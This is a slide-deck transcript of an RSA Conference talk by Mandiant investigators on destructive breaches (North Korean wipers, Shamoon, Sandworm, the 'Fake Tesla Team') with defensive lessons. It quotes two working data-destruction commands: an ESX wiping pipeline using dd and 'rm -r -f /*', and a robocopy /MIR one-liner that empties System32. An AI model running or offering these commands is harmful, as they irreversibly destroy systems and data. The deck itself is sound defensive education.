Lessons Learned from Investigating Disruptive Data Breaches · #RSAC SESSION ID: Vivek Chudgar....

#RSAC

SESSION ID:SESSION ID:

Vivek Chudgar

Lessons Learned from Investigating Disruptive Data Breaches

FLE-F01

Senior DirectorMandiant@VChudgar

Bart InglotPrincipal ConsultantMandiant@BartInglot

#RSAC

Agenda

2

Perception of Destructive Breaches

War StoriesDestructive North KoreaTroubles in the Persian GulfRussia vs UkraineFalse Flag Attack

Lessons Learned

#RSAC

Myth-Busting

“IT’S FASCINATING, BUT IT DOESN’T CONCERN ME”

3

#RSAC

Myth-Busting “Breaches Don’t Happen in All Verticals”

4

TOTAL INDUSTRIES INVESTIGATED

#RSAC

Myth-Busting “Breaches Don’t Happen in Asia Pacific”

5

#RSAC

Myth-Busting “No Disruptive Breaches in Asia Pacific”

6

• Ransomware attacks wreak havoc on IT systems around the world

• Notably WannaCry (May 2017) and NotPetya (June 2017)

• Very creative – worm, reuse of cached credentials, WMI and PsExec, bootkit, supply chain attack, etc.

• Was it targeted?

Image by bleepstatic.com

#RSAC

Myth-Busting “Formatting infected systems does the job”

7

Phishing Campaigns

Compromised HostsCorporate Network

#RSAC


8

Phishing Campaigns

Compromised Hosts

? ? ?

Corporate Network

Accessed Hosts

#RSAC


9

Unique Malware

B:5 / A:229Stolen Passwords

B:0 / A:51Infected Systems

B:3 / A:154Attacker CnC

B:12 / A:98

• The statistics before and after the enterprise-wide investigation

#RSAC


10

• The attackers were present in the environment for 7 years

• Multiple attacker groups with possibly different missions

• The initial infection vector was unknown, gigabytes left the network

• Public and custom tools• Backdoors: ZXShell, Gh0stRAT, Metasploit, Zegost, GRILLMARK, etc.

• Web shells: China Chopper, JspSpy, jFolder, etc.

• Key loggers, email miners, credential dumpers, tunnelers, etc.

• Compromised VPN credentials

#RSAC


11

• Unable to perform the routine work for few months

• Several planned IT and transformational projects put on hold

• Service impact – e.g. MSSP’s access was restricted

• Overall, disruptions to “the Business as Usual”

#RSAC

Disruptive Data Breaches

DESTRUCTION / EXTORTION / RANSOM / PWNAGE

12

#RSAC

Disruptive Data Breaches

DESTRUCTION / EXTORTION / RANSOM / PWNAGE

13

Destructive

#RSAC

North Korea Background

14

• Students chosen from top universities in DPRK• Well paid in US dollars, free access to the Internet, and have the opportunity

to travel outside of DPRK

• Known for causing disruptive attacks• DDoS, website defacement, Master Boot Record (MBR) wiping, and publishing

stolen data

• Attacks against victims are targeted and deliberate• Major attacks against organizations in Asia and North America• Ongoing attacks against South Korean media and financial services

organizations since 2009

#RSAC

North Korea Destructive Operations

• Multiple variants of malware designed to wipe Windows systems

• Malware was manually deployed by the attackers, but designed to automatically spread

• Malware operated differently depending on the type of system:1. Workstation – stopped antivirus and wrote a custom MBR to the disk

2. Server – disabled Terminal Services

3. Mail Server – stopped the mail service and disabled terminal services.

4. Domain Controllers – disabled terminal services and executed the wiper code after a period of time to allow the malware to continue spreading.

15

#RSAC

North Korea Destructive Operations (continued)

• Created script to wipe virtual machines on ESX servers

• The company’s backups were also erased

find / -type f -name “*.*” | grep -v “disks” | grep -v “\/dev” | awk‘{print “ls -l \”” $0 “\”” }’ |sh | awk ‘{if ($5>524288000) print “ddif=/dev/zero of=\”” $9 “\” bs=512k count=400 seek=400conv=notrunc,noerror > /dev/null 2>&1 &”}’ | sh

sleep 1 rm -r -f /boot/* & rm -r -f /vmfs/* & rm -r -f /* & rm -f /bin/* /sbin/* &exit

16

#RSAC

North Korea Lessons learned

17

• The level of access obtained by DPRK threat actors is no different than what’s obtained by China and Russia-based threat actors

• DPRK motivations are very different

• Ensure the backup environment is segmented from corporate network

#RSAC

Troubles in the Persian GulfMore MBR Wiping Malware

18

Image by naukriingulf.com

#RSAC

Shamoon Background

• 2012 – Widely publicised attack on Oil & Gas company in Middle East

• Designed to corrupt files and overwrite the MBR

• Nov 2016 – Recent resurgence targeting Gulf Cooperation Council (GCC) states

• Jan 2017 – Another wave of Shamoon attacks in GCC States

19

#RSAC

Shamoon November 2016

• The identified malware exhibits destructive behavior on Windows based operating systems

• The malware still uses a signed RawDisk driver from EldoS

File Name Path PE Compile Time MD5 File Size

ntssrvr64.exe %SYSTEMROOT%\System32 2009-02-15 12:32:19 8fbe990c2d493f58a2afa2b746e49c86 717,312

ntssrvr32.exe %SYSTEMROOT%\System32 N/A N/A 1,349,632

ntssrvr32.bat %SYSTEMROOT%\System32 N/A 10de241bb7028788a8f278e27a4e335f 160

gpget.exe %SYSTEMROOT%\System32 2009-02-15 12:30:41 c843046e54b755ec63ccb09d0a689674 327,680

drdisk.sys %SYSTEMROOT%\System32 2011-12-28 16:51:29 76c643ab29d497317085e5db8c799960 31,632

key8854321.pub %SYSTEMROOT%\System32 N/A b5d2a4d8ba015f3e89ade820c5840639 782

netinit.exe %SYSTEMROOT%\System32 N/A b9bc61194bfb520c551817904a945840 183,808

netimm173.pnf %SYSTEMROOT%\INF N/A 93b885adfe0da089cdf634904fd59f71 Varies

20

#RSAC

Shamoon Lessons Learned

• Old-tricks can work even years after – the RawDisk driver

• Do not upload to VirusTotal if you suspect a targeted attack• Hard-coded credentials• Information specific to your business• Tip-off the attackers

#RSAC

Russia vs UkraineThe Sandworm Team and War

22

#RSAC

Sandworm Team Background

• Destructive malware impacting Ukrainian Financial Sector (Dec 2016)

• Spearphishing lures w/ a Ministry of Finance theme

• The lure docs similar to prior campaigns that targeted Borispyl Airport, the Ukrainian Media, and the disrupted Ukrainian utilities.

23

#RSAC

Sandworm Team Destructive Operations

• At least one document was previously used as a Sandworm Team lure.

• Filename: • Додаток №2.xls

• MD5:• b75c869561e014f4d384773427c879a6

24

#RSAC

• The campaign from Dec 2016 leveraged STRAYKEY backdoor

• STRAYKEY uses Telegram API for CnC

• Capabilities:• Running remote commands• Uploading and exfiltrating files• Downloading additional files


25

#RSAC


• Deployed WHITEROSE – destructive malware, a variant of "KillDisk”

• Ukrainian Government financial agencies affected • Mr. Robot Themed• Two samples recovered:

ffb1e8babaecc4a8cb3d763412294469b75c869561e014f4d384773427c879a6

26

#RSAC

False Flag AttackExtortion by the Fake Telsa Team

27

Image by studyabroad.com

#RSAC

Fake Tesla Team Background

• Relatively unsophisticated threat, but very disruptive and destructive

• Compromised multiple natural resources and casino organizations in Canada

• Earliest known hacking activity dates back to 2013

28

#RSAC

Fake Tesla Team Background

• Stole several gigabytes of sensitive data and published it on the Internet (The Pirate Bay, Pastebin.com, Photobucket.com, Justpaste.it, and others)

• Created scheduled tasks to destroy production systems across the enterprise

• Victims endured system outages for multiple days as they recovered data from backups

• Extorted victims to pay ransoms between $50K and $500K (BTC)

29

#RSAC

Fake Tesla Team False Flags

• The real Tesla Team is believed to be a Serbian hacking group known for DDoS and defacement

• They are unlikely to be targeting Canadian organizations

• The threat actor previously claimed to be a Russian hacking group – “Angels of Truth”

• Likely use of Google Translate to write in Russian• Claimed to be both “Anonymous Threat Agent” and

“Tesla Team” with one victim

30

#RSAC

Fake Tesla Team Tool, Tactics, Procedures (TTPs)

• Leveraged publicly available tools like Metasploit and SplinterRAT

• PowerShell used to load simple stagers that connect to CnC

• Custom malware has not been observed

• Multi-year campaigns – observed in one environment for nearly 1.5 years

• Leveraged single factor VPN solutions for remote access

31

#RSAC

Fake Tesla Team Tool, Tactics, Procedures (TTPs)

• Backdoors and VPN solution accessed over TOR or compromised IPs

• Known to engage journalists to advertise certain breaches

• Simple, yet effective technique to wipe systems:

mkdir "C:\emptydir"robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800

32

#RSAC

Fake Tesla Team Lessons Learned

33

• If you don’t pay, your data will likely be dumped

• They exaggerate their technical skills and ability to access environments

• Partial payments may be able to buy time

Understand that paying the extortion may be the right option in some scenarios, but there are no guarantees the attackers won’t come back for

more money or simply leak the data anyway.

#RSAC

Lessons Learned

Responding to disruptive breaches is challenging, and not easy to plan for given the dynamic nature of these attacks and the attackers.

34

Image by fourseasons.com

#RSAC

35

Apply - Lessons Learned (1)

1. Engage experts before a breach (forensic, legal, public relations)

2. Confirm there actually is a breach

3. Establish if you are dealing with a human adversary

4. Remember that timing is critical

5. Keep focused on the incident

6. Consider all options when asked to pay ransom/extortion

7. Think of the ways your network could be accessed

#RSAC

36


8. Ensure strong segmentation and control over backups

Schrödinger’s Backup

The condition of any backup is unknown until a restore is attempted

Image by fatcat.ninja

#RSAC

37


9. After the incident has been handled, immediately focus on broader security improvements

10. If you kick them out, they will return

For additional information, see Mandiant M-Trends 2017 Report:

https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html

#RSAC

THANK YOUVivek ChudgarSenior [email protected]

Bart InglotPrincipal [email protected]

38

Lessons Learned from Investigating Disruptive Data Breaches · #RSAC SESSION ID: Vivek Chudgar....

Documents

Transcript of Lessons Learned from Investigating Disruptive Data Breaches · #RSAC SESSION ID: Vivek Chudgar....